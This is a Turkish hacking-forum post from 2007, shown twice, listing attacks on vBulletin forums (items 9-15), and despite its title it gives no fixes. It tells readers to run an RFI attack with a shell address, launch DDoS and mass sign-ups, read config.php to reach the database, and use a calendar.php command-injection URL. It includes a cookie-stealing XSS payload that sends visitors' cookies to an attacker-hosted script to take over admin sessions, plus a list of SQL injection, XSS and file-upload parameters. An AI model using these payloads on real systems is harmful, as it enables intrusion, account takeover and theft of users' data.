EzBeRiM - Tekil Mesaj gösterimi - Vbulletin Acıkları Ve Kapatma Yöntemleri.

~~Tin@rji~~ · 08-03-2007, 10:38 PM

9-) İmpex RFI Saldırısı:

Öncelikle [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) adresindeki kodları .php dosyası olarak kaydedin ve herhangi bir hosta kaydedip browserda çalıştırın. Gerekli yerleri doldurarak saldırıyı gerçekleştirebilirsiniz. Veya kısa yoldan [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) hedef yerine hedefsiteyi, fsoshelladresiniz kısmınada herhangi bir Shell adresi yazarak RFI saldırısı gerçekleştirebilirsiniz.

Herhalde Impex’in kurulu olduğu Vbulletinlerde çalıştığını söylememe gerek yoktur.

10-) DDOS Saldırıları;

Denyo Launch adlı programla sitede İmage Vertication yani üye olurken resim kodu doğrulama kısmı yoksa siteye DDOS atakları yapabilir, yüzlerce üye oluşturabilirsiniz Ayrıca
Vbulletin forumlara DDOS saldırısı yapmak için kodlanmış PERL exploitlerini de kullanabilirsiniz.

Mesela [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) bu exploit ile 3.5.3 ve altı sürümlere DDOS atağı yapabilirsiniz. Kodları .pl olarak kaydedin ve Active Perl yardımıyla kodları compile edip saldırıyı gerçekleştirin.

11-) Okunabilir Config.php ile Hack;

İncludes/config.php dosyası 777 yani okunabilir ve yazılabilir olarak ayarlanmışsa;

[Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) linkini kullanarak config.php dosyasını okuyabilirsiniz. Burada host tipinde localhost dışında bir değer varsa [mysql.host.com gibi] veritabanı kullanıcı adı, şifresi ve db adı ile Vbulletin veritabanına uzaktan bağlantı sağlayabilirsiniz. Bunu nasıl yapabileceğiniz anlatmıyorum şimdilik. Eğer localhost değeri varsa site ile aynı hosttan hesap açın, aynı hosttaki hesabınızdan config.php de bulunan bilgilere göre Vbulletin veritabanına ulaşım sağlayabilirsiniz. Ha bu arada mysql şifresinin, FTP ve Cpanel şifresi ile aynı olma ihtimalini göz ardı etmeyin Ki çoğu sitede aynıdır.

12-) Calander.php Açığı;

Çok eski bir açık ama neyse yinede bilmekte fayda var

[Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) -8-15&comma=“;echo%20’’;%20echo%20%60<command>%20%6 0;die();echo“

Hedefsite.com yerine hedefsitenizi yazın, browserde çalıştırın, Vbulletin 2.0.3 [peeh size çok eski demiştim ] sürümleri için geçerlidir.

13-) Vbulletin 3.0.7 Cookie Çalma Açığı;

Öncelikle [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) adresindeki kodları psphacker.php ismiyle php dosyası olarak kaydedin. Sonra herhangi bir hosta kaydedin.

onmouseover=’********.href= "http://www.phpdosyasınıuploadettiğinizadres.com/psphacker.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie’#

Bu kodu ise forumda mesaj olarak herhangi bir yere flash dosyası olarak gönderin. Yani editörde flash gösterme özelliği olması lazım. Mesajınızı görüntüleyenlerin cookieleri [Şifreleri vsvs] mail adresinize gidecektir. Size verdiğim php kodlarının içinde “Your Email Adress” diye bir kısım var. Oraya kendi Emailiniz ile değiştirmeniz gerekiyor. Cookieleri aldıktan sonra cookie editor ile admin cookiesini kendi cookieniz ile değiştirin. Siteye tekrar girdiğinizde admin olarak girmiş olacaksınız....

14-) Vbulletin Üye Grupları Açığı:

Aslında bu tam anlamıyla açık değil. Sitenin ana admini co-admin gibi özel kullanıcı grupları yaratır. Bu kullanıcı grupları genelde admincpye girebilir. Eğer admin bu üye gruplarına üye olmayı deaktif etmezse kullanıcı profil ayarlarımızdan co-admin olup admincp’ye ulaşabiliriz J Bu açığa sahip olan 3-4 tane site görmüştüm. Bu açığın oluşmasının tek sebebi adminin ihmalkarlığıdır. Admincpye girdikten sonra neler yapabileceğiniz hayal gücünüze kalmış !

15-) Vbulletin 3.0.9 SQL Enjeksiyonu & XSS Saldırıları;

SQL-Injection: (vB 3.0.9)
===============
> /joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
> /admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
> /admincp/userTiTle.php:
GET: <do=edit&userTiTleid=0XF>
> /admincp/usertools.php:
GET: <do=pmuserstats&ids=0XF>
o XSS: (Fixed in vB 3.0.9)
=====
> /admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>
> /admincp/index.php:
GET: <redirect=[XSS]>
> /admincp/user.php:
GET: <do=emailpassword&email=[XSS]>
> /admincp/language.php:
GET: <do=rebuild&goto=[XSS]>
> /admincp/modlog.php:
GET: <do=view&orderby=[XSS]>
> /admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]
o Arbitrary File Upload:
=======================
> /admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>
================
> /modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
> /modcp/user.php:
GET: <do=avatar&userid=0XF>
There are still a lot of security related bugs in the administrator
panel of the Vbulletin software. An authorized user could elevate his
privileges and read sensitive data.
> /admincp/admincalendar.php:
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=0XF>
> /admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
> /admincp/email.php:
POST: <do=makelist&user[0]=[SQL-Injection]>
> /admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
> /admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
> /admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
> /admincp/usertools.php:
POST: <do=updateprofilepic>
Even a privileged user should not be able to add posts, TiTles,
announcements etc. with HTML/JavaScript-Code in it.
> Not properly filtered: (XSS)
</admincp/announcement.php>
</admincp/admincalendar.php>
</admincp/bbcode.php>
</admincp/cronadmin.php>
</admincp/email.php?do=genlist>
</admincp/faq.php?do=add>
</admincp/forum.php?do=add>
</admincp/image.php?do=add&table=avatar/icon/smilie>
</admincp/language.php>
</admincp/ranks.php?do=add>
</admincp/replacement.php?do=add>
</admincp/replacement.php?do=edit>
</admincp/template.php?do=addstyle>
</admincp/template.php?do=edit>
</admincp/usergroup.php?do=add>
</admincp/userTiTle.php>

08-03-2007, 10:38 PM	#2 (permalink)
~~Tin@rji~~ Banned Ezberim Üyelik BiLgilerim Üyelik tarihi: Dec 2006 Nerden: Bilinmedik_DiYardan Üye No: 8327 Mesajlar: 0 Ezberim Tşk İstatistikleri Tesekkür: 140 397 Mesajına 611 Kere Teşekkür Edildi Ezberim Rep PuanLaması Tecrübe Puanı: 0 Rep Puanı: 10217 Rep Derecesi:	--->: Vbulletin Acıkları Ve Kapatma Yöntemleri. 9-) İmpex RFI Saldırısı: Öncelikle [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) adresindeki kodları .php dosyası olarak kaydedin ve herhangi bir hosta kaydedip browserda çalıştırın. Gerekli yerleri doldurarak saldırıyı gerçekleştirebilirsiniz. Veya kısa yoldan [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) hedef yerine hedefsiteyi, fsoshelladresiniz kısmınada herhangi bir Shell adresi yazarak RFI saldırısı gerçekleştirebilirsiniz. Herhalde Impex’in kurulu olduğu Vbulletinlerde çalıştığını söylememe gerek yoktur. 10-) DDOS Saldırıları; Denyo Launch adlı programla sitede İmage Vertication yani üye olurken resim kodu doğrulama kısmı yoksa siteye DDOS atakları yapabilir, yüzlerce üye oluşturabilirsiniz Ayrıca Vbulletin forumlara DDOS saldırısı yapmak için kodlanmış PERL exploitlerini de kullanabilirsiniz. Mesela [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) bu exploit ile 3.5.3 ve altı sürümlere DDOS atağı yapabilirsiniz. Kodları .pl olarak kaydedin ve Active Perl yardımıyla kodları compile edip saldırıyı gerçekleştirin. 11-) Okunabilir Config.php ile Hack; İncludes/config.php dosyası 777 yani okunabilir ve yazılabilir olarak ayarlanmışsa; [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) linkini kullanarak config.php dosyasını okuyabilirsiniz. Burada host tipinde localhost dışında bir değer varsa [mysql.host.com gibi] veritabanı kullanıcı adı, şifresi ve db adı ile Vbulletin veritabanına uzaktan bağlantı sağlayabilirsiniz. Bunu nasıl yapabileceğiniz anlatmıyorum şimdilik. Eğer localhost değeri varsa site ile aynı hosttan hesap açın, aynı hosttaki hesabınızdan config.php de bulunan bilgilere göre Vbulletin veritabanına ulaşım sağlayabilirsiniz. Ha bu arada mysql şifresinin, FTP ve Cpanel şifresi ile aynı olma ihtimalini göz ardı etmeyin Ki çoğu sitede aynıdır. 12-) Calander.php Açığı; Çok eski bir açık ama neyse yinede bilmekte fayda var [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) -8-15&comma=“;echo%20’’;%20echo%20%60<command>%20%6 0;die();echo“ Hedefsite.com yerine hedefsitenizi yazın, browserde çalıştırın, Vbulletin 2.0.3 [peeh size çok eski demiştim ] sürümleri için geçerlidir. 13-) Vbulletin 3.0.7 Cookie Çalma Açığı; Öncelikle [Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.] ([Linkleri Görebilmek İçin Üye Olmanız Gerekmektedir.Lütfen Buraya TIKLAYARAK Üye Olunuz.]) adresindeki kodları psphacker.php ismiyle php dosyası olarak kaydedin. Sonra herhangi bir hosta kaydedin. onmouseover=’********.href= "http://www.phpdosyasınıuploadettiğinizadres.com/psphacker.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie’# Bu kodu ise forumda mesaj olarak herhangi bir yere flash dosyası olarak gönderin. Yani editörde flash gösterme özelliği olması lazım. Mesajınızı görüntüleyenlerin cookieleri [Şifreleri vsvs] mail adresinize gidecektir. Size verdiğim php kodlarının içinde “Your Email Adress” diye bir kısım var. Oraya kendi Emailiniz ile değiştirmeniz gerekiyor. Cookieleri aldıktan sonra cookie editor ile admin cookiesini kendi cookieniz ile değiştirin. Siteye tekrar girdiğinizde admin olarak girmiş olacaksınız.... 14-) Vbulletin Üye Grupları Açığı: Aslında bu tam anlamıyla açık değil. Sitenin ana admini co-admin gibi özel kullanıcı grupları yaratır. Bu kullanıcı grupları genelde admincpye girebilir. Eğer admin bu üye gruplarına üye olmayı deaktif etmezse kullanıcı profil ayarlarımızdan co-admin olup admincp’ye ulaşabiliriz J Bu açığa sahip olan 3-4 tane site görmüştüm. Bu açığın oluşmasının tek sebebi adminin ihmalkarlığıdır. Admincpye girdikten sonra neler yapabileceğiniz hayal gücünüze kalmış ! 15-) Vbulletin 3.0.9 SQL Enjeksiyonu & XSS Saldırıları; SQL-Injection: (vB 3.0.9) =============== > /joinrequests.php: POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0> > /admincp/user.php: GET: <do=find&orderby=username&limitnumber=[SQL-Injection]> GET: <do=find&orderby=username&limitstart=[SQL-Injection]> > /admincp/userTiTle.php: GET: <do=edit&userTiTleid=0XF> > /admincp/usertools.php: GET: <do=pmuserstats&ids=0XF> o XSS: (Fixed in vB 3.0.9) ===== > /admincp/css.php: GET: <do=doedit&dostyleid=1&group=[XSS]> > /admincp/index.php: GET: <redirect=[XSS]> > /admincp/user.php: GET: <do=emailpassword&email=[XSS]> > /admincp/language.php: GET: <do=rebuild&goto=[XSS]> > /admincp/modlog.php: GET: <do=view&orderby=[XSS]> > /admincp/template.php: GET: <do=colorconverter&hex=[XSS]> GET: <do=colorconverter&rgb=[XSS]> GET: <do=modify&expandset=[XSS] o Arbitrary File Upload: ======================= > /admincp/image.php: POST: <do=upload&table=avatar> POST: <do=upload&table=icon> POST: <do=upload&table=smilie> ================ > /modcp/announcement.php: POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05 &announcement[0]=[SQL-Injection]> > /modcp/user.php: GET: <do=avatar&userid=0XF> There are still a lot of security related bugs in the administrator panel of the Vbulletin software. An authorized user could elevate his privileges and read sensitive data. > /admincp/admincalendar.php: POST: <do=update&calendarid=1&calendar[daterange]=1970-2030& calendar[0]=[SQL-Injection]> POST: <do=updatemod&moderatorid=1&moderator[calendarid]=0XF> > /admincp/cronlog.php: POST: <do=doprunelog&cronid=0XF> POST: <do=prunelog&cronid=0XF> > /admincp/email.php: POST: <do=makelist&user[0]=[SQL-Injection]> > /admincp/help.php: POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]> > /admincp/language.php: POST: <do=update&rvt[0]=[SQL-Injection]> > /admincp/phrase.php: POST: <do=completeorphans&keep[0]=[SQL-Injection]> > /admincp/usertools.php: POST: <do=updateprofilepic> Even a privileged user should not be able to add posts, TiTles, announcements etc. with HTML/JavaScript-Code in it. > Not properly filtered: (XSS) </admincp/announcement.php> </admincp/admincalendar.php> </admincp/bbcode.php> </admincp/cronadmin.php> </admincp/email.php?do=genlist> </admincp/faq.php?do=add> </admincp/forum.php?do=add> </admincp/image.php?do=add&table=avatar/icon/smilie> </admincp/language.php> </admincp/ranks.php?do=add> </admincp/replacement.php?do=add> </admincp/replacement.php?do=edit> </admincp/template.php?do=addstyle> </admincp/template.php?do=edit> </admincp/usergroup.php?do=add> </admincp/userTiTle.php>